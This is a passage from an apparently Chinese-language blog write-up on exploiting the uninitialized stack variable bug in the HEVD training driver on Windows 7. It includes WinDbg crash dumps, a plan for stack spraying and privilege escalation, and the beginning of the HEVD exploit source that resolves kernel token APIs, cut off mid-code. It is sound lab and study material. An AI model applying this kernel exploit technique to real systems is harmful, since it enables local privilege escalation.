----&gt; CallBack函数</span><br><span class="line">9adb9ad8  c080327c</span><br><span class="line">9adb9adc  00433009</span><br><span class="line">9adb9ae0  00000001</span><br><span class="line">9adb9ae4  0000015d</span><br><span class="line">9adb9ae8  9adb9b14</span><br><span class="line">9adb9aec  83ec8a26 nt!MiSwapWslEntries+0x14c</span><br><span class="line">9adb9af0  00433009</span><br><span class="line">9adb9af4  0000014f</span><br><span class="line">9adb9af8  75abe001</span><br><span class="line">9adb9afc  0000014f</span><br><span class="line">9adb9b00  c0802000</span><br><span class="line">9adb9b04  85da5928</span><br><span class="line">9adb9b08  00000001</span><br><span class="line">9adb9b0c  00000059</span><br><span class="line">9adb9b10  00000000</span><br><span class="line">9adb9b14  9adb9b40</span><br><span class="line">9adb9b18  83ec6397 nt!MiUpdateWsle+0x12d</span><br><span class="line">9adb9b1c  0000014f</span><br><span class="line">9adb9b20  0000015d</span><br><span class="line">9adb9b24  85d6d6c0</span><br><span class="line">9adb9b28  0000015d</span><br><span class="line">9adb9b2c  85d6d6c0</span><br></pre></td></tr></table></figure>

<p>可以看到调用了 0x00000000，然而这个地址是个非法地址，所以crash。挺奇怪的是这个时候g命令还可以继续走…所以我又跑了一次PoC。<br>我第二次运行PoC获得的信息如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br></pre></td><td class="code"><pre><span class="line">kd&gt; !analyze -v</span><br><span class="line">*******************************************************************************</span><br><span class="line">*                                                                             *</span><br><span class="line">*                        Bugcheck Analysis                                    *</span><br><span class="line">*                                                                             *</span><br><span class="line">*******************************************************************************</span><br><span class="line"></span><br><span class="line">PAGE_FAULT_IN_NONPAGED_AREA (50)</span><br><span class="line">Invalid system memory was referenced.  This cannot be protected by try-except.</span><br><span class="line">Typically the address is just plain bad or it is pointing at freed memory.</span><br><span class="line">Arguments:</span><br><span class="line">Arg1: ffffffdd, memory referenced.</span><br><span class="line">Arg2: 00000001, value 0 = read operation, 1 = write operation.</span><br><span class="line">Arg3: 59477005, If non-zero, the instruction address which referenced the bad memory</span><br><span class="line">    address.</span><br><span class="line">Arg4: 00000000, (reserved)</span><br><span class="line"></span><br><span class="line">Debugging Details:</span><br><span class="line">------------------</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">DUMP_CLASS: 1</span><br><span class="line"></span><br><span class="line">DUMP_QUALIFIER: 0</span><br><span class="line"></span><br><span class="line">BUILD_VERSION_STRING:  6.1.7600.16385 (win7_rtm.090713-1255)</span><br><span class="line"></span><br><span class="line">DUMP_TYPE:  0</span><br><span class="line"></span><br><span class="line">BUGCHECK_P1: ffffffffffffffdd</span><br><span class="line"></span><br><span class="line">BUGCHECK_P2: 1</span><br><span class="line"></span><br><span class="line">BUGCHECK_P3: 59477005</span><br><span class="line"></span><br><span class="line">BUGCHECK_P4: 0</span><br><span class="line"></span><br><span class="line">WRITE_ADDRESS:  ffffffdd </span><br><span class="line"></span><br><span class="line">FAULTING_IP: </span><br><span class="line">MSVCR110D!_ioinitCallback+1e5</span><br><span class="line">59477005 0068dd          add     byte ptr [eax-23h],ch</span><br><span class="line"></span><br><span class="line">MM_INTERNAL_CODE:  0</span><br><span class="line"></span><br><span class="line">CPU_COUNT: 1</span><br><span class="line"></span><br><span class="line">CPU_MHZ: af1</span><br><span class="line"></span><br><span class="line">CPU_VENDOR:  GenuineIntel</span><br><span class="line"></span><br><span class="line">CPU_FAMILY: 6</span><br><span class="line"></span><br><span class="line">CPU_MODEL: 3c</span><br><span class="line"></span><br><span class="line">CPU_STEPPING: 3</span><br><span class="line"></span><br><span class="line">CPU_MICROCODE: 6,3c,3,0 (F,M,S,R)  SIG: 1E&apos;00000000 (cache) 1E&apos;00000000 (init)</span><br><span class="line"></span><br><span class="line">DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT</span><br><span class="line"></span><br><span class="line">BUGCHECK_STR:  0x50</span><br><span class="line"></span><br><span class="line">PROCESS_NAME:  test.exe</span><br><span class="line"></span><br><span class="line">CURRENT_IRQL:  2</span><br><span class="line"></span><br><span class="line">ANALYSIS_SESSION_HOST:  MUHE-PC</span><br><span class="line"></span><br><span class="line">ANALYSIS_SESSION_TIME:  02-04-2017 19:46:44.0573</span><br><span class="line"></span><br><span class="line">ANALYSIS_VERSION: 10.0.14321.1024 x86fre</span><br><span class="line"></span><br><span class="line">TRAP_FRAME:  8d47ea40 -- (.trap 0xffffffff8d47ea40)</span><br><span class="line">ErrCode = 00000002</span><br><span class="line">eax=00000000 ebx=94f53ca4 ecx=0024f9f0 edx=00000065 esi=baadf00d edi=00000000</span><br><span class="line">eip=59477005 esp=8d47eab4 ebp=8d47ebd4 iopl=0         nv up ei pl nz na pe nc</span><br><span class="line">cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010206</span><br><span class="line">MSVCR110D!_ioinitCallback+0x1e5:</span><br><span class="line">59477005 0068dd          add     byte ptr [eax-23h],ch      ds:0023:ffffffdd=??</span><br><span class="line">Resetting default scope</span><br><span class="line"></span><br><span class="line">MISALIGNED_IP: </span><br><span class="line">MSVCR110D!_ioinitCallback+1e5</span><br><span class="line">59477005 0068dd          add     byte ptr [eax-23h],ch</span><br><span class="line"></span><br><span class="line">LAST_CONTROL_TRANSFER:  from 83ee5e71 to 83e74394</span><br><span class="line"></span><br><span class="line">STACK_TEXT:  </span><br><span class="line">8d47e58c 83ee5e71 00000003 dbca9caa 00000065 nt!RtlpBreakWithStatusInstruction</span><br><span class="line">8d47e5dc 83ee696d 00000003 86557030 00000000 nt!KiBugCheckDebugBreak+0x1c</span><br><span class="line">8d47e9a0 83e8e8e3 00000050 ffffffdd 00000001 nt!KeBugCheck2+0x68b</span><br><span class="line">8d47ea28 83e4f5f8 00000001 ffffffdd 00000000 nt!MmAccessFault+0x106</span><br><span class="line">8d47ea28 59477005 00000001 ffffffdd 00000000 nt!KiTrap0E+0xdc</span><br><span class="line">8d47ebd4 94f52fe8 0024f9f0 8d47ebfc 94f53219 MSVCR110D!_ioinitCallback+0x1e5</span><br><span class="line">WARNING: Stack unwind information not available. Following frames may be wrong.</span><br><span class="line">8d47ebe0 94f53219 878eb928 878eb998 85d8bf80 HEVD+0x4fe8</span><br><span class="line">8d47ebfc 83e454bc 878bbbb0 878eb928 878eb928 HEVD+0x5219</span><br><span class="line">8d47ec14 84046eee 85d8bf80 878eb928 878eb998 nt!IofCallDriver+0x63</span><br><span class="line">8d47ec34 84063cd1 878bbbb0 85d8bf80 00000000 nt!IopSynchronousServiceTail+0x1f8</span><br><span class="line">8d47ecd0 840664ac 878bbbb0 878eb928 00000000 nt!IopXxxControlFile+0x6aa</span><br><span class="line">8d47ed04 83e4c42a 0000001c 00000000 00000000 nt!NtDeviceIoControlFile+0x2a</span><br><span class="line">8d47ed04 76e464f4 0000001c 00000000 00000000 nt!KiFastCallEntry+0x12a</span><br><span class="line">0024f828 76e44cac 74fda08f 0000001c 00000000 ntdll!KiFastSystemCallRet</span><br><span class="line">0024f82c 74fda08f 0000001c 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc</span><br><span class="line">0024f88c 76c0ec25 0000001c 0022202f 0024f9f0 KERNELBASE!DeviceIoControl+0xf6</span><br><span class="line">0024f8b8 013e1612 0000001c 0022202f 0024f9f0 kernel32!DeviceIoControlImplementation+0x80</span><br><span class="line">0024fa34 013e1cc9 00000001 00350598 00351ba8 test+0x11612</span><br><span class="line">0024fa84 013e1ebd 0024fa98 76c11174 7ffd4000 test+0x11cc9</span><br><span class="line">0024fa8c 76c11174 7ffd4000 0024fad8 76e5b3f5 test+0x11ebd</span><br><span class="line">0024fa98 76e5b3f5 7ffd4000 76c02850 00000000 kernel32!BaseThreadInitThunk+0xe</span><br><span class="line">0024fad8 76e5b3c8 013e1082 7ffd4000 00000000 ntdll!__RtlUserThreadStart+0x70</span><br><span class="line">0024faf0 00000000 013e1082 7ffd4000 00000000 ntdll!_RtlUserThreadStart+0x1b</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">STACK_COMMAND:  kb</span><br><span class="line"></span><br><span class="line">THREAD_SHA1_HASH_MOD_FUNC:  b2a297aada69e6279fdc3daae6f4a22cf686509a</span><br><span class="line"></span><br><span class="line">THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  4f005ee17e97a074c7da84fec24b29c43a55219c</span><br><span class="line"></span><br><span class="line">THREAD_SHA1_HASH_MOD:  c3a8502bd33e9f58cfa688b5c9397c7eefe7acfa</span><br><span class="line"></span><br><span class="line">FOLLOWUP_IP: </span><br><span class="line">HEVD+4fe8</span><br><span class="line">94f52fe8 5d              pop     ebp</span><br><span class="line"></span><br><span class="line">FAULT_INSTR_CODE:  8c25d</span><br><span class="line"></span><br><span class="line">SYMBOL_STACK_INDEX:  6</span><br><span class="line"></span><br><span class="line">SYMBOL_NAME:  HEVD+4fe8</span><br><span class="line"></span><br><span class="line">FOLLOWUP_NAME:  MachineOwner</span><br><span class="line"></span><br><span class="line">IMAGE_NAME:  hardware</span><br><span class="line"></span><br><span class="line">DEBUG_FLR_IMAGE_TIMESTAMP:  0</span><br><span class="line"></span><br><span class="line">MODULE_NAME: hardware</span><br><span class="line"></span><br><span class="line">FAILURE_BUCKET_ID:  IP_MISALIGNED</span><br><span class="line"></span><br><span class="line">BUCKET_ID:  IP_MISALIGNED</span><br><span class="line"></span><br><span class="line">PRIMARY_PROBLEM_CLASS:  IP_MISALIGNED</span><br><span class="line"></span><br><span class="line">TARGET_TIME:  2017-02-04T11:45:48.000Z</span><br><span class="line"></span><br><span class="line">OSBUILD:  7600</span><br><span class="line"></span><br><span class="line">OSSERVICEPACK:  16385</span><br><span class="line"></span><br><span class="line">SERVICEPACK_NUMBER: 0</span><br><span class="line"></span><br><span class="line">OS_REVISION: 0</span><br><span class="line"></span><br><span class="line">SUITE_MASK:  272</span><br><span class="line"></span><br><span class="line">PRODUCT_TYPE:  1</span><br><span class="line"></span><br><span class="line">OSPLATFORM_TYPE:  x86</span><br><span class="line"></span><br><span class="line">OSNAME:  Windows 7</span><br><span class="line"></span><br><span class="line">OSEDITION:  Windows 7 WinNt TerminalServer SingleUserTS</span><br><span class="line"></span><br><span class="line">OS_LOCALE:  </span><br><span class="line"></span><br><span class="line">USER_LCID:  0</span><br><span class="line"></span><br><span class="line">OSBUILD_TIMESTAMP:  2009-07-14 07:15:19</span><br><span class="line"></span><br><span class="line">BUILDDATESTAMP_STR:  090713-1255</span><br><span class="line"></span><br><span class="line">BUILDLAB_STR:  win7_rtm</span><br><span class="line"></span><br><span class="line">BUILDOSVER_STR:  6.1.7600.16385</span><br><span class="line"></span><br><span class="line">ANALYSIS_SESSION_ELAPSED_TIME: 2f92</span><br><span class="line"></span><br><span class="line">ANALYSIS_SOURCE:  KM</span><br><span class="line"></span><br><span class="line">FAILURE_ID_HASH_STRING:  km:ip_misaligned</span><br><span class="line"></span><br><span class="line">FAILURE_ID_HASH:  &#123;201b0e5d-db2a-63d2-77be-8ce8ff234750&#125;</span><br><span class="line"></span><br><span class="line">Followup:     MachineOwner</span><br><span class="line">---------</span><br></pre></td></tr></table></figure>
<p>这里g之后就是直接蓝屏了。</p>
<h4 id="0x03-利用思路"><a href="#0x03-利用思路" class="headerlink" title="0x03:利用思路"></a>0x03:利用思路</h4><p>大致的利用思路如下：</p>
<ul>
<li>布置内核栈</li>
<li>触发漏洞</li>
<li>提权</li>
</ul>
<p>关于内核栈的布置，使用的是<a href="http://j00ru.vexillium.org/?p=769" target="_blank" rel="noopener">出自j00ru文章</a>的方法，这里直接使用了HEVD的exploit，我只做一点分析。</p>
<h4 id="0x04-Exploit分析"><a href="#0x04-Exploit分析" class="headerlink" title="0x04:Exploit分析"></a>0x04:Exploit分析</h4><p>HEVD 里的 Exploit代码如下</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">"UninitializedStackVariable.h"</span></span></span><br><span class="line"></span><br><span class="line"><span class="function">VOID <span class="title">ResolveKernelAPIs</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    PCHAR KernelImage;</span><br><span class="line">    SIZE_T ReturnLength;</span><br><span class="line">    HMODULE hNtDll = <span class="literal">NULL</span>;</span><br><span class="line">    PVOID HalDispatchTable = <span class="literal">NULL</span>;</span><br><span class="line">    HMODULE hKernelInUserMode = <span class="literal">NULL</span>;</span><br><span class="line">    PVOID KernelBaseAddressInKernelMode;</span><br><span class="line">    NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;</span><br><span class="line">    PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;</span><br><span class="line"></span><br><span class="line">    DEBUG_INFO(<span class="string">"\t\t[+] Resolving Kernel APIs\n"</span>);</span><br><span class="line"></span><br><span class="line">    hNtDll = LoadLibrary(<span class="string">"ntdll.dll"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!hNtDll) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t\t[-] Failed To Load NtDll.dll: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, <span class="string">"NtQuerySystemInformation"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!NtQuerySystemInformation) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        DEBUG_INFO(<span class="string">"\t\t\t[+] NtQuerySystemInformation: 0x%p\n"</span>, NtQuerySystemInformation);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    NtMapUserPhysicalPages = (NtMapUserPhysicalPages_t)GetProcAddress(hNtDll, <span class="string">"NtMapUserPhysicalPages"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!NtMapUserPhysicalPages) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t\t[-] Failed Resolving NtMapUserPhysicalPages: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        DEBUG_INFO(<span class="string">"\t\t\t[+] NtMapUserPhysicalPages: 0x%p\n"</span>, NtMapUserPhysicalPages);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    NtStatus = NtQuerySystemInformation(SystemModuleInformation, <span class="literal">NULL</span>, <span class="number">0</span>, &amp;ReturnLength);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Allocate the Heap chunk</span></span><br><span class="line">    pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),</span><br><span class="line">                                                                     HEAP_ZERO_MEMORY,</span><br><span class="line">                                                                     ReturnLength);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!pSystemModuleInformation) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    NtStatus = NtQuerySystemInformation(SystemModuleInformation,</span><br><span class="line">                                        pSystemModuleInformation,</span><br><span class="line">                                        ReturnLength,</span><br><span class="line">                                        &amp;ReturnLength);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (NtStatus != STATUS_SUCCESS) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    KernelBaseAddressInKernelMode = pSystemModuleInformation-&gt;Module[<span class="number">0</span>].Base;</span><br><span class="line">    KernelImage = <span class="built_in">strrchr</span>((PCHAR)(pSystemModuleInformation-&gt;Module[<span class="number">0</span>].ImageName), <span class="string">'\\'</span>) + <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    hKernelInUserMode = LoadLibraryA(KernelImage);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!hKernelInUserMode) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t\t[-] Failed To Load Kernel: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ZwOpenProcess = (ZwOpenProcess_t)GetProcAddress(hKernelInUserMode, <span class="string">"ZwOpenProcess"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!ZwOpenProcess) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t\t[-] Failed Resolving ZwOpenProcess: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        ZwOpenProcess = (ZwOpenProcess_t)((ULONG)ZwOpenProcess - (ULONG)hKernelInUserMode);</span><br><span class="line">        ZwOpenProcess = (ZwOpenProcess_t)((ULONG)ZwOpenProcess + (ULONG)KernelBaseAddressInKernelMode);</span><br><span class="line">        DEBUG_INFO(<span class="string">"\t\t\t[+] ZwOpenProcess: 0x%p\n"</span>, ZwOpenProcess);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ZwOpenProcessToken = (ZwOpenProcessToken_t)GetProcAddress(hKernelInUserMode, <span class="string">"ZwOpenProcessToken"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!ZwOpenProcessToken) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t\t[-] Failed Resolving ZwOpenProcessToken: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        ZwOpenProcessToken = (ZwOpenProcessToken_t)((ULONG)ZwOpenProcessToken - (ULONG)hKernelInUserMode);</span><br><span class="line">        ZwOpenProcessToken = (ZwOpenProcessToken_t)((ULONG)ZwOpenProcessToken + (ULONG)KernelBaseAddressInKernelMode);</span><br><span class="line">        DEBUG_INFO(<span class="string">"\t\t\t[+] ZwOpenProcessToken: 0x%p\n"</span>, ZwOpenProcess);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ZwDuplicateToken = (ZwDuplicateToken_t)GetProcAddress(hKernelInUserMode, <span class="string">"ZwDuplicateToken"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!ZwDuplicateToken) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t\t[-] Failed Resolving ZwDuplicateToken: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        ZwDuplicateToken = (ZwDuplicateToken_t)((ULONG)ZwDuplicateToken - (ULONG)hKernelInUserMode);</span><br><span class="line">        ZwDuplicateToken = (ZwDuplicateToken_t)((ULONG)ZwDuplicateToken + (ULONG)KernelBaseAddressInKernelMode);</span><br><span class="line">        DEBUG_INFO(<span 